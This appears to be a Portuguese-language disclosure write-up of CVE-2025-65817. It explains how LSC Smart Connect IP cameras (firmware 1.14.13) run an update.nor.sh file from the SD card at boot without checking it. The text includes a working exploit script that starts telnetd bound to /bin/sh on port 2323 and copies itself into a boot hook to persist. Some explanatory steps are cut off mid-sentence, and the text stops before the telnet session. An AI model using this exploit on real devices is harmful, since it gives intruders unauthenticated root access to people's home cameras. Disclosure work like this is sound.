
Here is the CVE-2025-65817
| Campos | Valor |
|---|---|
| Título | Relatório de Vulnerabilidade: Câmera Inteligente LSC Smart Connect |
| Data | 2024-02-15 |
| Descrição | Abusando do gancho de atualização do cartão SD para gerar shells remotas em câmeras LSC Smart Connect. |
| Tags | iot, vulnerability, cve |
| Firmware | 1.14.13 |
A vulnerabilidade encontrada consiste em explorar o sistema de atualização em start_app.sh, mais precisamente por meio da montagem do cartão SD e do arquivo update.nor.sh.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
A seção local/sbin/start_app.sh:50–99 confia cegamente em qualquer arquivo chamado update.nor.sh localizado no cartão SD. Durante o processo de inicialização, o script:
update.nor.sh para /tmp/update.nor.sh,Mais adiante na sequência de inicialização (local/sbin/start_app.sh:108–129), o arquivo copiado é:
Essa execução ocorre antes que o ipc_service principal inicie, significando que o script é executado em um ambiente de maior privilégio onde utilitários de rede, funções de watchdog e auxiliares de atualização já estão disponíveis.
O exploit consiste em criar um shell e abrir uma porta via telnetd, que está presente na câmera:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
Basta escrever um script .sh no cartão SD e nomeá-lo update.nor.sh.
O exploit que escolhi é:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
Confirmamos que a porta está aberta.

Conectamos via telnet:
